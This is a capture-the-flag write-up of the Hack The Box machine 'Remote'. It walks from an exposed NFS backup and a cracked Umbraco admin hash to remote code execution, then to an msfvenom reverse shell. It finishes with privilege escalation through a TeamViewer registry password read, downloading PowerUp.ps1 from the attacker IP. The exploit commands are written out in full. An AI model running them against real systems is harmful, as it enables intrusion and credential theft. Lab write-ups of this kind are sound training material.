Remote is an easy windows machine from Hack the box.
Lets get started with the result nmap scan
At port 80 there was a http server running
When I naviagated through the pages I found some names which could be potential usernames
I thought of brute forcing these usernames on smb service
In parallel I also initiated gobuster and got below output
From the /umbraco page I got a login page
I tried based sql injection but was not working
Here I got introduced to umbraco cms. Straight away I googles for umbraco exploit.
But I am not sure about the version running and also the exploit needed some admin credentials
Later when I examined the nmap results I saw port 111. So there are possibility of RPC like nfs, nlockmgr etc
I tried to check it using showmount command
Lets enumerate this backup!!
From this list I decided to investigate on web.config for possible passwords
I was not able to locate any usefull password. But I got a file names
Umbraco.sdf
using find command I located the file and using strings command I was able to find admin hash
adminadmin@htb.local
hash : b8be16afba8c314ad33d812f22a04991b90e2aaa
By using john I was able to decrypt the password in no time
the password is baconandcheese
I tried to login to Umbaco portal with these credentials
I just confirmed the Umbraco version v7.12.4
A customised exploit for the cve was found from github
https://github.com/noraj/Umbraco-RCE
I was able to do RCE , In the below example I executed ‘systeminfo’ command
python3 exploit.py -u admin@htb.local -p baconandcheese -i ‘http://10.10.10.180’ -c powershell.exe -a ‘-NoProfile -Command systeminfo’
I uploaded a payload which can connect back to my attacker machine using msfvenom
I was able to upload it through CMS dashboard
I was able to locate the shell I uploaded
now time to execute and obtain the shell
python3 exploit.py -u admin@htb.local -p baconandcheese -i ‘http://10.10.10.180’ -c powershell.exe -a ‘-NoProfile -Command C:/inetpub/wwwroot/media/1038/ehackify.exe’
with in no time I got the shell
I downloaded the poweup.ps1 to the target machine for enumerating prev escalation
invoke-webrequest -Uri http://10.10.14.195/Powerup.ps1 -outfile p.ps1
Its possible to abuse the UsoSvc service at C:\Windows\system32\svchost.exe
I also ran winPEAS.exe
and I was able to know teamviewer was running
I decided to move with out metasploit
I navigated towards the teamViewer file location and execute below commands for extracting password
Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7
I was able to read the SecurityPasswordAES with below command
(New-Object -ComObject WScript.Shell).RegRead(“HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7\SecurityPasswordAES”)
These numbers are integers with base 10 and we have to conert them to base 16
From github I was able to find a script yo decrypt this and I got the password as
!R3m0te!
Next is to login as administrator with this password.
I used evil-Winrm to login
System Compromised!
If you found this write up useful, you can respect me on hackthebox
https://www.hackthebox.eu/home/users/profile/240146
You can connect me on
LinkedIn: Derick N
Twitter: Derick N
Leave a Reply